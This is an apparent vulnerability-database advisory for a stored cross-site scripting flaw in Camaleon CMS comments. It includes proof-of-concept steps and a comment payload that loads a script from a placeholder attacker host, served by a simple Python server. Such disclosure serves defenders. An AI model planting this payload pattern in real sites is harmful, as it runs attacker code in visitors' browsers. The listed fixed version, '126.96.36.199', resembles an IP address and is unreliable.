Mend Vulnerability Database
What is a CVE vulnerability ID? What is a WS vulnerability ID?New vulnerability? Tell us about it!
We found results for “”
Date: October 20, 2021
OverviewIn Camaleon CMS application, versions 0.0.1 to 2.6.0 are vulnerable to stored XSS, which allows an unauthenticated attacker to store malicious scripts in the comments section of the post. These scripts are executed in a victim’s browser when they open the page containing the malicious comment.
DetailsThe “Camaleon CMS” application is affected by a stored XSS vulnerability that allows unprivileged application users to store malicious scripts in the comments section of the post. These scripts are executed in a victim’s browser when they open the page containing the malicious comment.
PoC DetailsLogin to the application as administrator.
Go to Settings, General Site. Click on the configuration tab and enable the following options:
1. Register comments as approved
2. Allow anonymous comments
Then go to the Post section in the left menu under Contents sections and click All Items to show all the posts. Edit a post by clicking on the pencil icon and then check the “Allow Comments” option to allow comments on the post and click on the Update button.
Now open the application in incognito mode and navigate to the “/sample-post” endpoint to view the post. The option to provide comments can be seen at the end of the post.
As an attacker, create a file “test.js” containing a malicious script such as the one given below, and run a simple python server to serve the file. Create a new comment with the below given script.
Now any user visiting the post is affected. To confirm it, login again as administrator, visit the same post there, and notice that the admin is affected.
// Command to run the Python Simple Server to host the malicious file: python3 -m http.server <port_number> // Create a new comment with the following script: <script src="http://<attacker_ip>:<port>/test.js"></script> // Contents of test.js: alert(‘XSS’);
Affected EnvironmentsCamaleon CMS versions 0.0.1 to 2.6.0
PreventionUpdate to camaleon_cms version 126.96.36.199
Good to know:
|Attack Vector (AV):||Network|
|Attack Complexity (AC):||Low|
|Privileges Required (PR):||None|
|User Interaction (UI):||Required|
|Access Vector (AV):||Network|
|Access Complexity (AC):||Medium|